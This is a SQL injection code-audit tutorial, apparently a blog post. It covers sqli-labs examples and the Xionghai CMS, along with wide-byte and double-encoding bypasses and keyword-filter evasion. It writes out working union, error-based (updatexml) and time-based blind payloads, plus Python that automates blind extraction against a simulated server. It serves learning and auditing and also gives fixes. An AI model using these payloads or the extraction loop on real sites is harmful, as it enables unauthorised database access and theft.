SQL injection code audit

0x00 introduction

Why start with this chapter? Readers who followed the file upload series I wrote earlier will find SQL injection easy to pick up after that. SQL injection is also what we most often look for in an audit: compared with it, getting a shell directly is unrealistic, and vulnerabilities of that kind are rare.

0x01 string-type injection

Let's look at the code of Less-1 of sqli-labs:

<?php
// including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    // logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // connectivity: $id is concatenated into the statement without escaping (the injection point)
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());   // the MySQL error is echoed back, which allows error-based injection
        echo "</font>";
    }
}
else { echo "Please input the ID as parameter with numeric value";}
?>

We can see that $_GET['id'] is read and placed in the SQL statement without any processing. As long as magic_quotes_gpc is off, this is a straightforward injection. Even with magic quotes on, a numeric-type parameter can still be injected: magic_quotes_gpc only escapes single quotes, double quotes, backslashes and NUL, and a numeric injection needs none of those characters.

http://127.0.0.1/sqli/Less-1/?id=-1%27union%20select%201,user(),3--%20+

0x02 encoding-type injection

For business reasons, some programs decode an encoded parameter and then bring it into the database query. base64 is the most common case, and some programs also call url decoding themselves. This style is usually seen in frameworks.

1.base64

<?php
include("../sql-connections/sql-connect.php");
// $id is decoded AFTER the request has passed through magic_quotes_gpc
$id=base64_decode($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if ($row) {
    echo "id:".$row['id']."<br>";
    echo "user name:".$row['username']."<br>";
    echo "password:".$row['password']."<br>";
}else{
    print_r(mysql_error());
}
echo '<hr>';
echo "The query statement is: $sql";
?>

The incoming value is base64-decoded and then brought into the query. Magic quotes cannot intercept this injection, because the quote only appears after decoding, and decoding runs after magic_quotes_gpc has already done its escaping. When a site base64-encodes its parameters, this is worth a look.

http://127.0.0.1/sqli/Less-1/base64.php?id=JyB1bmlvbiBzZWxlY3QgMSx1c2VyKCksMyAtLSAr

2.urldecode

<?php
include("../sql-connections/sql-connect.php");
// PHP has already url-decoded $_GET once; this is a second decode
$id=urldecode($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if ($row) {
    echo "id:".$row['id']."<br>";
    echo "user name:".$row['username']."<br>";
    echo "password:".$row['password']."<br>";
}else{
    print_r(mysql_error());
}
echo '<hr>';
echo "The query statement is: $sql";
?>
Because PHP url-decodes the query string only once when the request arrives, what magic quotes sees is %27, which contains nothing to escape; the script's own urldecode() then turns it into a real quote, so the filter is bypassed:

http://127.0.0.1/sqli/Less-1/base64.php?id=%2527union%20select%201,user(),3--%20+
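The three scripts (Less-1 in 0x01, and the base64 and urldecode variants in this section) differ only in what happens to $_GET['id'] between magic_quotes_gpc and the query. The following Python model is an added example, not code from sqli-labs or the original post: it replays the page's three payloads through each path and checks, using MySQL's backslash-escape rule, whether the quote still terminates the literal. addslashes() and php_get() are my stand-ins for magic_quotes_gpc and for PHP's one-time decoding of the query string.

```python
import base64
from urllib.parse import unquote_plus


def addslashes(s):
    """Model of PHP addslashes() / magic_quotes_gpc: backslash before ' " \\ and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))


def php_get(raw_query_value):
    """What $_GET holds: PHP percent-decodes the query string exactly once
    (and turns '+' into a space, which also mangles '+' inside base64)."""
    return unquote_plus(raw_query_value)


def breaks_out_of_literal(value):
    """True if `value`, placed between single quotes as in "WHERE id='$id'",
    contains a quote MySQL would treat as the end of the literal
    (a backslash escapes the next character, '' is a doubled quote)."""
    i = 0
    while i < len(value):
        c = value[i]
        if c == "\\":
            i += 2
            continue
        if c == "'":
            if i + 1 < len(value) and value[i + 1] == "'":
                i += 2
                continue
            return True
        i += 1
    return False


def less1(raw, magic_quotes):
    """Less-1: $id = $_GET['id'] used directly."""
    v = php_get(raw)
    return addslashes(v) if magic_quotes else v


def less1_base64(raw, magic_quotes):
    """base64.php: $id = base64_decode($_GET['id']); decoding happens after escaping."""
    return base64.b64decode(less1(raw, magic_quotes)).decode()


def less1_urldecode(raw, magic_quotes):
    """urldecode variant: $id = urldecode($_GET['id']); a second decode after escaping."""
    return unquote_plus(less1(raw, magic_quotes))


def build_sql(id_value):
    return "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % id_value


# The page's own three payloads, exactly as they appear in the URLs above
PLAIN = "-1%27union%20select%201,user(),3--%20+"
B64 = "JyB1bmlvbiBzZWxlY3QgMSx1c2VyKCksMyAtLSAr"
DOUBLE = "%2527union%20select%201,user(),3--%20+"


def results():
    """For each (script, magic_quotes) pair: does the payload escape the quoted
    literal? Only the plain script with magic quotes on is blocked."""
    return {
        "plain/off": breaks_out_of_literal(less1(PLAIN, False)),
        "plain/on": breaks_out_of_literal(less1(PLAIN, True)),
        "base64/on": breaks_out_of_literal(less1_base64(B64, True)),
        "urldecode/on": breaks_out_of_literal(less1_urldecode(DOUBLE, True)),
    }


if __name__ == "__main__":
    for name, broke in results().items():
        print("%-13s %s" % (name, "INJECTED" if broke else "blocked"))
    print(build_sql(less1_urldecode(DOUBLE, True)))
```

The lesson for auditing is the ordering: any transformation applied to a parameter after the global escaping (base64_decode, urldecode, stripslashes, str_replace of a placeholder) is a candidate injection point, regardless of magic quotes.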

0x03 wide byte injection

<?php
$conn = mysql_connect('localhost', 'root', 'root');
mysql_select_db("security",$conn);
mysql_query("set names 'gbk' ",$conn);
$id=urldecode($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
 
if ($row) {
    echo "id:".$row['id']."<br>";
    echo "user name:".$row['username']."<br>";
    echo "password:".$row['password']."<br>";
}else{
    print_r(mysql_error());
}
echo '<hr>';
echo "The query statement is: $sql";
?>

There are many explanations of this on the Internet, so I won't go into detail. The general reason is as follows (the escaping comes from magic_quotes_gpc or addslashes(), and the connection charset is set to gbk by the set names above):

id=1'    -> after escaping: id=1\'      -> bytes: 1%5c%27

id=1%df' -> after escaping: 1%df%5c%27  -> MySQL reads the statement as GBK, and %df%5c is one two-byte character (運) -> id=1運'

The backslash has been swallowed into the previous character, and the quote is free again.
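To make the byte-level effect visible, here is an added Python example (not code from the page): it applies addslashes() to the raw bytes of id=1%df' and decodes the escaped bytes the way MySQL does under the connection charset, once as GBK and once as UTF-8. The byte-level addslashes_bytes() and as_mysql_parses() are my own models of PHP escaping and of MySQL's charset decoding.

```python
def addslashes_bytes(b):
    """PHP addslashes() applied to raw request bytes (what magic_quotes_gpc or
    an explicit addslashes() does): prefix ' " \\ and NUL with 0x5c."""
    out = bytearray()
    for x in b:
        if x in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(x)
    return bytes(out)


def as_mysql_parses(escaped, charset):
    """MySQL decodes the statement bytes in the connection charset before
    tokenising. Under GBK a lead byte 0x81-0xFE takes the following byte
    (0x40-0xFE, except 0x7F) as the second half of one character, so 0xDF 0x5C
    becomes one CJK character and the quote after it is no longer escaped.
    Under UTF-8 the same 0xDF is an invalid sequence and 0x5C stays a backslash."""
    return escaped.decode(charset, errors="replace")


def probe(charset):
    """Return (escaped bytes, text MySQL sees, whether the quote is still escaped)
    for the page's id=1%df' trick."""
    raw = bytes.fromhex("31df27")            # "1" 0xDF "'"  i.e. id=1%df'
    esc = addslashes_bytes(raw)              # 31 df 5c 27
    text = as_mysql_parses(esc, charset)
    still_escaped = "\\'" in text
    return esc, text, still_escaped


if __name__ == "__main__":
    for cs in ("gbk", "utf-8"):
        esc, text, ok = probe(cs)
        print(cs, esc.hex(), repr(text), "quote escaped" if ok else "QUOTE FREE")
```

The fix is not to escape harder but to make escaping charset-aware: set the connection charset through the client API (mysql_set_charset() / mysqli_set_charset()) rather than a raw set names, so that mysql_real_escape_string() knows which bytes are lead bytes, or use prepared statements so that no escaping is needed at all.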

Of course there are other types of injection; I won't list them all here. After reading the MySQL series of articles you should know most of them, and you can look up whatever you don't.

0x04 filtering

Generally, a mature CMS has no completely unfiltered input. Most programs filter with functions such as addslashes(), or rely on magic quotes. Many more use regular-expression matching to filter, and a wrong match-and-replace method gives a much greater chance of bypass. For example, some programs replace "union" with an empty string; then double-writing it as "ununionion" leaves "union" behind after one replacement, and the same trick may also get past an external WAF. For integer-type parameters the usual protection is type conversion, such as intval(). Later we will go through this step by step in a real audit.
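As an added example (not code from any CMS discussed here), the following Python models the single-pass keyword filter described above, the double-write bypass, a repeat-until-stable variant, and the intval()-style fix for integer parameters. naive_filter(), fixpoint_filter() and intval() are my own stand-ins for the PHP code a CMS would contain.

```python
import re


def naive_filter(value):
    """A replace-with-empty filter as found in many programs: removes
    'union' once, case-insensitively. Double-writing the keyword defeats it."""
    return re.sub(r"union", "", value, count=1, flags=re.I)


def fixpoint_filter(value):
    """Repeat the replacement until nothing changes. This closes the
    double-write hole, but inline comments (un/**/ion), other encodings and
    every other keyword still need handling, so blacklists remain fragile."""
    while True:
        new = re.sub(r"union", "", value, flags=re.I)
        if new == value:
            return new
        value = new


def intval(value):
    """PHP intval() on a string: optional leading whitespace and sign, then
    digits; anything else yields 0. Whatever follows the number is dropped."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def build_numeric_query(cid):
    """Numeric context: no quotes, so escaping alone would not help; intval() does."""
    return "SELECT * FROM content WHERE cid=%d" % intval(cid)


def demo():
    """Constructed inputs showing the three behaviours side by side."""
    payload = "ununionion select 1,user(),3"
    return {
        "naive": naive_filter(payload),        # 'union select ...' survives
        "fixpoint": fixpoint_filter(payload),  # keyword fully removed
        "numeric": build_numeric_query("1 and sleep(10)"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-9s %s" % (k, v))
```

For string contexts, the robust answer is a parameterised query rather than any keyword list; intval() is only adequate where the value really is an integer in the SQL.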

0x05 actual audit

After looking for source code for a long time, I settled on Xionghai CMS V1.0 (xhcms). This CMS is a good fit: it has all kinds of holes and is well suited to learning auditing. There are also many audit write-ups of this CMS, so if my writeup is unsatisfying you can read theirs.

First, we audit the incoming parameters. To quickly see whether there is global filtering, find a file and have it output $_POST, $_GET and so on:

echo $_POST['b'];
echo $_GET['a'];

There is no global filtering, so let's go to the backend login file admin/files/login.php; login files generally have a chance of injection.

Obviously the user parameter brought into the query is not filtered, and the database error is output, so error-based injection can be used. A universal password also works, of course.

payload:

user=1111' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- +&password=111&login=yes
Next look at the message board, files/submit.php.

The incoming parameters are not filtered.

This is an INSERT, and mysql_error() is echoed here, so error-based injection works; otherwise only blind injection would be possible.

payload:

cid=0&name='or updatexml(1,concat(0x7e,(version())),0) or'&mail=1111&url=http%3A%2F%2F1&content=%E9%98%BF%E5%BE%B7&save=%E6%8F%90%E4%BA%A4&randcode=&jz=1&tz=1

As mentioned at the start, an escaping function alone is not enough: numeric injection does not need quotes.

We can see that the incoming cid is escaped by addslashes(). The query itself is fine, but the same cid is used again when the view count is updated, and it is numeric, so addslashes() does not help. Since errors are echoed, both blind injection and error-based injection are available.

payload:

http://127.0.0.1/xhcms/?r=content&cid=1%20and%20If(ascii(substr(database(),1,1))%3C10,0,sleep(10))
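The sleep() payload above is one probe; reading data out requires a loop that asks the server one comparison at a time. The following Python is an added example, not code from xhcms or the original post: it binary-searches each byte of database() using the page's payload shape. The HTTP request and response timing are replaced by simulated_oracle() and a constructed SECRET_DB so the loop runs offline; against a live target, the oracle would send the request and return True when the response took about `delay` seconds.

```python
import re

SECRET_DB = "security"  # constructed stand-in for what database() returns


def payload(pos, threshold, delay=10):
    """Same shape as cid=1 and If(ascii(substr(database(),1,1))<10,0,sleep(10)):
    the page sleeps only when the byte at `pos` is NOT below `threshold`."""
    return ("1 and if(ascii(substr(database(),%d,1))<%d,0,sleep(%d))"
            % (pos, threshold, delay))


def simulated_oracle(fragment):
    """Pretend to be the server: True means 'the response was delayed'.
    MySQL's ascii(substr(s,pos,1)) is 0 once pos is past the end of s."""
    m = re.search(r"substr\(database\(\),(\d+),1\)\)<(\d+)", fragment)
    pos, threshold = int(m.group(1)), int(m.group(2))
    byte = ord(SECRET_DB[pos - 1]) if pos <= len(SECRET_DB) else 0
    return not (byte < threshold)


def extract_byte(pos, oracle):
    """The largest t in 0..127 for which oracle(payload(pos, t)) is True is the
    byte value: about 7 requests per character instead of up to 127."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if oracle(payload(pos, mid)):
            lo = mid
        else:
            hi = mid - 1
    return lo


def extract_database(oracle, max_len=64):
    """Read bytes left to right until ascii() returns 0 (end of string)."""
    out = []
    for pos in range(1, max_len + 1):
        b = extract_byte(pos, oracle)
        if b == 0:
            break
        out.append(chr(b))
    return "".join(out)


if __name__ == "__main__":
    print(extract_database(simulated_oracle))
```

With a real time-based oracle, pick the delay well above the normal response jitter and repeat any borderline measurement; a single mis-timed request flips one bit of the binary search and corrupts the character.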
There are other injections in this system; those who want to practice can download it and audit it themselves. The general idea is that wherever there is user interaction there may be injection. This is also an audit approach that does not require reading through all of the code.

Tags: Database SQL

Posted on Fri, 29 Oct 2021 18:59:54 -0400 by jrtaylor